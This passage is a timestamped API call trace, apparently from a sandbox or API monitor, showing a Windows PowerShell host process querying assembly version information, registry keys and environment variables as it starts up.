	[0093.170] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x458
	[0093.170] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xedbe0 | out: lpdwProcessId=0xedbe0) returned 0x778
	[0093.175] WerSetFlags () returned 0x0
	[0093.185] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0093.185] CoTaskMemFree (pv=0x0) 
	[0093.186] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xedf48, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xedf40 | out: pulNumLanguages=0xedf48, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xedf40) returned 1
	[0093.187] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xedf48, pwszLanguagesBuffer=0x2c24040, pcchLanguagesBuffer=0xedf40 | out: pulNumLanguages=0xedf48, pwszLanguagesBuffer=0x2c24040, pcchLanguagesBuffer=0xedf40) returned 1
	[0093.193] CoTaskMemAlloc (cb=0x24) returned 0x27f4e0
	[0093.193] GetUserDefaultLocaleName (in: lpLocaleName=0x27f4e0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0093.194] CoTaskMemFree (pv=0x27f4e0) 
	[0093.229] CoTaskMemAlloc (cb=0x104) returned 0x2825f0
	[0093.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2825f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0093.229] CoTaskMemFree (pv=0x2825f0) 
	[0093.232] CoTaskMemAlloc (cb=0x104) returned 0x2825f0
	[0093.232] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2825f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0093.232] CoTaskMemFree (pv=0x2825f0) 
	[0093.235] CoTaskMemAlloc (cb=0x104) returned 0x2825f0
	[0093.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2825f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0093.235] CoTaskMemFree (pv=0x2825f0) 
	[0093.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0093.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0093.276] SetErrorMode (uMode=0x1) returned 0x1
	[0093.276] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xedbc0 | out: lpFileInformation=0xedbc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0093.276] SetErrorMode (uMode=0x1) returned 0x1
	[0093.276] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xede30 | out: lpdwHandle=0xede30) returned 0x94c
	[0093.278] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c278d0 | out: lpData=0x2c278d0) returned 1
	[0093.279] VerQueryValueW (in: pBlock=0x2c278d0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedda8, puLen=0xedda0 | out: lplpBuffer=0xedda8*=0x2c2796c, puLen=0xedda0) returned 1
	[0093.279] VerQueryValueW (in: pBlock=0x2c278d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xedd18, puLen=0xedd10 | out: lplpBuffer=0xedd18*=0x2c27a48, puLen=0xedd10) returned 1
	[0093.279] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0093.279] CoTaskMemAlloc (cb=0x2e) returned 0x278900
	[0093.279] lstrcpyW (in: lpString1=0x278900, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0093.279] CoTaskMemFree (pv=0x278900) 
	[0093.279] VerQueryValueW (in: pBlock=0x2c278d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xedd18, puLen=0xedd10 | out: lplpBuffer=0xedd18*=0x2c27a9c, puLen=0xedd10) returned 1
	[0093.279] lstrlenW (lpString="System.Management.Automation") returned 28
	[0093.279] CoTaskMemAlloc (cb=0x3c) returned 0x282670
	[0093.279] lstrcpyW (in: lpString1=0x282670, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0093.279] CoTaskMemFree (pv=0x282670) 
	[0093.279] VerQueryValueW (in: pBlock=0x2c278d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xedd18, puLen=0xedd10 | out: lplpBuffer=0xedd18*=0x2c27af8, puLen=0xedd10) returned 1
	[0093.279] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0093.279] CoTaskMemAlloc (cb=0x20) returned 0x27f540
	[0093.280] lstrcpyW (in: lpString1=0x27f540, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0093.280] CoTaskMemFree (pv=0x27f540) 
	[0093.280] VerQueryValueW (in: pBlock=0x2c278d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xedd18, puLen=0xedd10 | out: lplpBuffer=0xedd18*=0x2c27b38, puLen=0xedd10) returned 1
	[0093.280] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0093.280] CoTaskMemAlloc (cb=0x44) returned 0x282670
	[0093.280] lstrcpyW (in: lpString1=0x282670, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0093.280] CoTaskMemFree (pv=0x282670) 
	[0093.280] VerQueryValueW (in: pBlock=0x2c278d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xedd18, puLen=0xedd10 | out: lplpBuffer=0xedd18*=0x2c27ba0, puLen=0xedd10) returned 1
	[0093.280] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0093.280] CoTaskMemAlloc (cb=0x76) returned 0x21b230
	[0093.280] lstrcpyW (in: lpString1=0x21b230, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0093.280] CoTaskMemFree (pv=0x21b230) 
	[0093.280] VerQueryValueW (in: pBlock=0x2c278d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xedd18, puLen=0xedd10 | out: lplpBuffer=0xedd18*=0x2c27c3c, puLen=0xedd10) returned 1
	[0093.280] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0093.280] CoTaskMemAlloc (cb=0x44) returned 0x282670
	[0093.280] lstrcpyW (in: lpString1=0x282670, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0093.280] CoTaskMemFree (pv=0x282670) 
	[0093.280] VerQueryValueW (in: pBlock=0x2c278d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xedd18, puLen=0xedd10 | out: lplpBuffer=0xedd18*=0x2c27ca0, puLen=0xedd10) returned 1
	[0093.280] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0093.280] CoTaskMemAlloc (cb=0x58) returned 0x27de80
	[0093.280] lstrcpyW (in: lpString1=0x27de80, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0093.280] CoTaskMemFree (pv=0x27de80) 
	[0093.280] VerQueryValueW (in: pBlock=0x2c278d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xedd18, puLen=0xedd10 | out: lplpBuffer=0xedd18*=0x2c27d1c, puLen=0xedd10) returned 1
	[0093.281] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0093.281] CoTaskMemAlloc (cb=0x20) returned 0x27f540
	[0093.281] lstrcpyW (in: lpString1=0x27f540, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0093.281] CoTaskMemFree (pv=0x27f540) 
	[0093.281] VerQueryValueW (in: pBlock=0x2c278d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xedd18, puLen=0xedd10 | out: lplpBuffer=0xedd18*=0x2c279c4, puLen=0xedd10) returned 1
	[0093.281] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0093.281] CoTaskMemAlloc (cb=0x66) returned 0x1f47c0
	[0093.281] lstrcpyW (in: lpString1=0x1f47c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0093.281] CoTaskMemFree (pv=0x1f47c0) 
	[0093.281] VerQueryValueW (in: pBlock=0x2c278d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xedd18, puLen=0xedd10 | out: lplpBuffer=0xedd18*=0x0, puLen=0xedd10) returned 0
	[0093.281] VerQueryValueW (in: pBlock=0x2c278d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xedd18, puLen=0xedd10 | out: lplpBuffer=0xedd18*=0x0, puLen=0xedd10) returned 0
	[0093.281] VerQueryValueW (in: pBlock=0x2c278d0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xedd18, puLen=0xedd10 | out: lplpBuffer=0xedd18*=0x0, puLen=0xedd10) returned 0
	[0093.281] VerQueryValueW (in: pBlock=0x2c278d0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xedce8, puLen=0xedce0 | out: lplpBuffer=0xedce8*=0x2c2796c, puLen=0xedce0) returned 1
	[0093.281] CoTaskMemAlloc (cb=0x204) returned 0x22b7e0
	[0093.281] VerLanguageNameW (in: wLang=0x0, szLang=0x22b7e0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0093.281] CoTaskMemFree (pv=0x22b7e0) 
	[0093.281] VerQueryValueW (in: pBlock=0x2c278d0, lpSubBlock="\\", lplpBuffer=0xedd38, puLen=0xedd30 | out: lplpBuffer=0xedd38*=0x2c278f8, puLen=0xedd30) returned 1
	[0093.293] CoTaskMemAlloc (cb=0x104) returned 0x2835f0
	[0093.293] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2835f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0093.293] CoTaskMemFree (pv=0x2835f0) 
	[0093.312] CoTaskMemAlloc (cb=0x104) returned 0x2835f0
	[0093.312] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2835f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0093.312] CoTaskMemFree (pv=0x2835f0) 
	[0093.318] lstrlenW (lpString="䅁") returned 1
	[0093.336] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xedc08 | out: phkResult=0xedc08*=0x304) returned 0x0
	[0093.338] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xedbf8 | out: phkResult=0xedbf8*=0x308) returned 0x0
	[0093.338] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xedc88 | out: phkResult=0xedc88*=0x30c) returned 0x0
	[0093.342] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xedbcc, lpData=0x0, lpcbData=0xedbc8*=0x0 | out: lpType=0xedbcc*=0x1, lpData=0x0, lpcbData=0xedbc8*=0x56) returned 0x0
	[0093.343] CoTaskMemAlloc (cb=0x5a) returned 0x1f4910
	[0093.343] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xedb9c, lpData=0x1f4910, lpcbData=0xedb98*=0x56 | out: lpType=0xedb9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xedb98*=0x56) returned 0x0
	[0093.343] CoTaskMemFree (pv=0x1f4910) 
	[0093.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0093.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0093.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0093.418] CoTaskMemAlloc (cb=0x104) returned 0x2835f0
	[0093.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2835f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0093.418] CoTaskMemFree (pv=0x2835f0) 
	[0093.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0093.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0093.840] CoTaskMemAlloc (cb=0x104) returned 0x2867a0
	[0093.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2867a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0093.840] CoTaskMemFree (pv=0x2867a0) 
	[0093.842] CoTaskMemAlloc (cb=0x104) returned 0x2867a0
	[0093.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2867a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0093.842] CoTaskMemFree (pv=0x2867a0) 
	[0093.934] CoTaskMemAlloc (cb=0x104) returned 0x2867a0
	[0093.934] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2867a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0093.934] CoTaskMemFree (pv=0x2867a0) 
	[0093.936] CoTaskMemAlloc (cb=0x104) returned 0x2867a0
	[0093.936] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2867a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0093.936] CoTaskMemFree (pv=0x2867a0) 
	[0093.937] CoTaskMemAlloc (cb=0x104) returned 0x2867a0
	[0093.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2867a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0093.937] CoTaskMemFree (pv=0x2867a0) 
	[0094.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0094.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0094.367] CoTaskMemAlloc (cb=0x104) returned 0x2835f0
	[0094.367] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2835f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0094.367] CoTaskMemFree (pv=0x2835f0) 
	[0094.370] CoTaskMemAlloc (cb=0x104) returned 0x2835f0
	[0094.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2835f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0094.370] CoTaskMemFree (pv=0x2835f0) 
	[0094.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0095.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0095.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0095.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0095.702] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0096.042] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0096.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0096.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0096.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xed7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0096.449] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0096.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0096.449] CoTaskMemFree (pv=0x28e180) 
	[0096.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0096.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0096.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0096.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0096.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xed8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0096.625] SetErrorMode (uMode=0x1) returned 0x1
	[0096.625] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xedb60 | out: lpFileInformation=0xedb60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0096.626] SetErrorMode (uMode=0x1) returned 0x1
	[0097.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.059] CoTaskMemAlloc (cb=0x104) returned 0x28e180
